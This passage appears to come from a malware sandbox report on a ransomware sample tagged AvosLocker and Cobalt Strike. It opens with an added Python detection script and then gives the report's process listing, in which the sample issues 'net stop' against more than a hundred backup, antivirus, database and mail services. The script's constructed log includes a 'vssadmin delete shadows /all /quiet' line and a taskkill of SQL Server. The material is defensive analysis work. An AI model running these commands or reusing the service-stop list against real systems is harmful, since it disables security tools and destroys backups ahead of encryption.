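The WriteProcessMemory rows above show one parent (PID 2180, the sample) spawning net.exe over and over, each net.exe re-spawning net1.exe with the same arguments, and the Processes section below shows what those arguments were: `net stop "<backup / AV / SQL / Exchange service>" /y`, dozens of times. Together with the "Interacts with shadow copies" (vssadmin.exe) and "Kills process with taskkill" signatures, that is the inhibitor phase of the run. The following is an added detection example in Python; it is not part of the sandbox report or of any vendor's tooling. It reads a constructed, simplified `pid|ppid|image|commandline` form of process-creation telemetry (the field mapping to Sysmon Event ID 1 or Security 4688 is an assumption), attributes every `net stop` to the process that issued it by climbing out of the net.exe/net1.exe wrapper pair (so each stop is counted once), and flags a parent that stops many services, or a few of the targeted backup/AV services while also launching vssadmin.exe or taskkill.exe. The sample log is modelled on the process tree in this report, but the report records only the image names for vssadmin.exe and taskkill.exe, so their arguments in the sample are assumed, not observed.

```python
"""Added example: flag a ransomware service-stop / shadow-copy 'inhibitor' chain in
process-creation telemetry given as pid|ppid|image|commandline lines (a constructed,
simplified form of Sysmon Event ID 1 / Security 4688 fields)."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Subset of the service names from the `net stop "<name>" /y` lines in this
# report's Processes section; extend it with the rest of that list.
TARGETED_SERVICES = {
    "acronis vss provider", "acronisagent", "sophos agent", "sophos mcs agent",
    "symantec system recovery", "veeam backup catalog data service", "mbamservice",
    "backupexecjobengine", "backupexecvssprovider", "mcshield", "mssqlserver",
}
NET_IMAGES = ("\\net.exe", "\\net1.exe")  # net.exe re-spawns net1.exe with the same args
INHIBITOR_IMAGES = ("\\vssadmin.exe", "\\taskkill.exe")
NET_STOP_RE = re.compile(r'\bstop\s+"?(.+?)"?(?:\s+/y)?\s*$', re.IGNORECASE)

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

@dataclass
class Finding:
    pid: int
    image: str
    services: list = field(default_factory=list)    # every service it tried to stop
    targeted: list = field(default_factory=list)    # ...of which backup/AV/DB services
    inhibitors: list = field(default_factory=list)  # vssadmin/taskkill children

def parse_events(lines):
    events = []
    for line in lines:
        line = line.strip()
        if line and not line.startswith("#"):
            pid, ppid, image, cmdline = line.split("|", 3)
            events.append(ProcEvent(int(pid), int(ppid), image, cmdline))
    return events

def _is(image, suffixes):
    return image.lower().endswith(suffixes)

def _owner_pid(pid, by_pid):
    """Climb out of net.exe/net1.exe wrappers to the process that issued the stop."""
    while pid in by_pid and _is(by_pid[pid].image, NET_IMAGES):
        pid = by_pid[pid].ppid
    return pid

def detect(events, min_stops=5, min_targeted=2):
    """One Finding per parent that behaves like the sample: many service stops, or
    a few backup/AV stops combined with a vssadmin.exe or taskkill.exe child."""
    by_pid = {e.pid: e for e in events}
    findings, seen = {}, set()

    def finding_for(pid):
        image = by_pid[pid].image if pid in by_pid else "<not in log>"
        return findings.setdefault(pid, Finding(pid, image))

    for ev in events:
        if _is(ev.image, NET_IMAGES):
            m = NET_STOP_RE.search(ev.cmdline)
            if not m:
                continue
            svc, owner = m.group(1).strip().lower(), _owner_pid(ev.ppid, by_pid)
            if (owner, svc) in seen:  # net.exe and its net1.exe child: count once
                continue
            seen.add((owner, svc))
            f = finding_for(owner)
            f.services.append(svc)
            if svc in TARGETED_SERVICES:
                f.targeted.append(svc)
        elif _is(ev.image, INHIBITOR_IMAGES):
            finding_for(ev.ppid).inhibitors.append(ev.image.rsplit("\\", 1)[-1].lower())
    return [f for f in findings.values() if len(f.services) >= min_stops
            or (len(f.targeted) >= min_targeted and f.inhibitors)]

def flagged_pids(lines, **thresholds):
    return sorted(f.pid for f in detect(parse_events(lines), **thresholds))

# Constructed log modelled on this report's process tree (PID 2180 = the sample).
# The report records only the image names of vssadmin.exe and taskkill.exe, so
# their arguments below are assumed, not observed.
SAMPLE_LOG = r"""
2180|1400|C:\Users\Admin\AppData\Local\Temp\sample.exe|"C:\Users\Admin\AppData\Local\Temp\sample.exe"
2672|2180|C:\Windows\SysWOW64\net.exe|net stop "Acronis VSS Provider" /y
2844|2672|C:\Windows\SysWOW64\net1.exe|C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
2700|2180|C:\Windows\SysWOW64\net.exe|net stop "Sophos Agent" /y
2760|2700|C:\Windows\SysWOW64\net1.exe|C:\Windows\system32\net1 stop "Sophos Agent" /y
2912|2180|C:\Windows\SysWOW64\net.exe|net stop "Veeam Backup Catalog Data Service" /y
888|2912|C:\Windows\SysWOW64\net1.exe|C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
2704|2180|C:\Windows\SysWOW64\net.exe|net stop "MSSQLSERVER" /y
2588|2704|C:\Windows\SysWOW64\net1.exe|C:\Windows\system32\net1 stop "MSSQLSERVER" /y
2596|2180|C:\Windows\SysWOW64\net.exe|net stop "BackupExecJobEngine" /y
2544|2596|C:\Windows\SysWOW64\net1.exe|C:\Windows\system32\net1 stop "BackupExecJobEngine" /y
3100|2180|C:\Windows\SysWOW64\vssadmin.exe|vssadmin delete shadows /all /quiet
3120|2180|C:\Windows\SysWOW64\taskkill.exe|taskkill /F /IM sqlservr.exe
# benign: an administrator restarting the print spooler from an elevated console
4120|4100|C:\Windows\System32\net.exe|net stop "Spooler" /y
4130|4120|C:\Windows\System32\net1.exe|C:\Windows\system32\net1 stop "Spooler" /y
"""

if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_LOG.splitlines())):
        print(f"{f.image} (pid {f.pid}): {len(f.services)} stops, "
              f"{len(f.targeted)} backup/AV/DB targets, children={f.inhibitors}")
```

Two design points carry over to a production rule. First, count stops at the level of the process that issued them: net.exe always hands off to net1.exe with identical arguments, so a naive count per image doubles every hit and attributes half of them to net.exe itself. Second, the thresholds are deliberately two-sided: a lone `net stop` of a targeted service is normal administration, but a handful of them from the same parent that also launches vssadmin.exe or taskkill.exe is the combination this sample shows, and a large number of stops from one parent is suspicious regardless of which services they name.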

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

